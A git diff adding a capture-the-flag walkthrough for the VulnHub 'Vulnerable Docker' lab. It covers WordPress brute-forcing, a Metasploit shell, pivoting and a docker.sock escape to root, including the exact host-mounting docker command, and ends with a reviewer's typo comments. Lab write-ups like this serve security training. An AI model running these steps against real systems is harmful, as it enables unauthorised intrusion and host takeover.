diff --git a/VulnHub/Vulnerable_docker_Hard.md b/VulnHub/Vulnerable_docker_Hard.md new file mode 100644 index 0000000..333f93f --- /dev/null +++ b/VulnHub/Vulnerable_docker_Hard.md 
@@ -0,0 +1,140 @@ +# Vulnhub- Vulnerable Docker (Hard) + +## NMAP + +``` +nmap -p- -sC -sV 192.168.1.7 + +Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 22:24 PKT +Nmap scan report for 192.168.1.7 +Host is up (0.00013s latency). +Not shown: 65533 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA) +| 2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA) +| 256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA) +|_ 256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519) +8000/tcp open http Apache httpd 2.4.10 ((Debian)) +|_http-generator: WordPress 4.8.15 +|_http-open-proxy: Proxy might be redirecting requests +| http-robots.txt: 1 disallowed entry +|_/wp-admin/ +|_http-server-header: Apache/2.4.10 (Debian) +|_http-title: NotSoEasy Docker – Just another WordPress site +|_http-trane-info: Problem with XML parsing of /evox/about +MAC Address: 08:00:27:D7:94:9E (Oracle VirtualBox virtual NIC) +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
+Nmap done: 1 IP address (1 host up) scanned in 15.88 seconds + +``` + +## PORT 8000 (HTTP) + + + +We can see this is a wordpress site so let's run `wpscan` on the site + + + + + +wpscan found a user name `bob` we can now try brute forcing the password + + + + + +Login with the credentials found + + + + + +Now we can either manually upload a php reverse shell or use metasploit exploit + + + + + + + +We didn't get a proper meterpreter shell because of web shell exploit we used so we need to generate linux payload , upload and execute on the target machine + + + +Open another meterpreter window and configure the listener + + + + + + + +Now commands can be run properly + + + +Use metasploit's `autoroute` to do pivoting + + + +Now we need to find what's running on docker conatiner so we can use metasploit's `auxiliary/scanner/portscan/tcp` module + + + +In order to access the ports we found we need to use proxychains for that we run `socks` module on metasploit and use proxyfroxy to configure proxy for browser + + + +Verify that the port is added in the `/etc/porxychains.conf` + + + + + + + +We can find `docker.sock` on the container which means we can create another container having host machien file system mounted on it + + + + + +But to upload a static binary on that container there is no utility to download a file but we do have internet avaiable on the machine so we can download `docker` as well but before that I downloaded `python3` on the container so I could get a stabilized shell + +Run `apt update` and then `apt install python3` + + + + + + +Download static binary and transfer it to target machine + + + + + + + +Since we have `docker.sock` on our container we can list the imgaes being used + +`./docker -H unix:///var/run/docker.sock images` + + + +Now to mount the host file system on the container + +`./docker -H unix:///var/run/docker.sock run -it -v /:/host/ wordpress chroot /host` + + + +Add your generated ssh public key in `authorized_keys` and then ssh 
on the box as root + + + + \ No newline at end of file
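Review bot: the new walkthrough has several misspellings that should be fixed before merging, the most important being the path in `Verify that the port is added in the /etc/porxychains.conf`, which should read `/etc/proxychains.conf` (a reader copying it will look for a file that does not exist); the same pass should catch `conatiner`, `machien`, `avaiable`, `imgaes` and `proxyfroxy` (FoxyProxy). The gaps between steps are empty runs of blank lines where screenshots were evidently meant to go, so either the image links were not added to the commit or they were stripped; add them, or put the actual commands inline, because several steps (the `wpscan` invocation, the `autoroute` and `socks` module settings, the `auxiliary/scanner/portscan/tcp` results) are only described and a reader cannot reproduce them from the text. Since the final escalation depends entirely on the host's `docker.sock` being mounted into the container, a closing sentence naming that as the misconfiguration to avoid would make the writeup more useful as a lessons-learned document. The file also ends without a trailing newline.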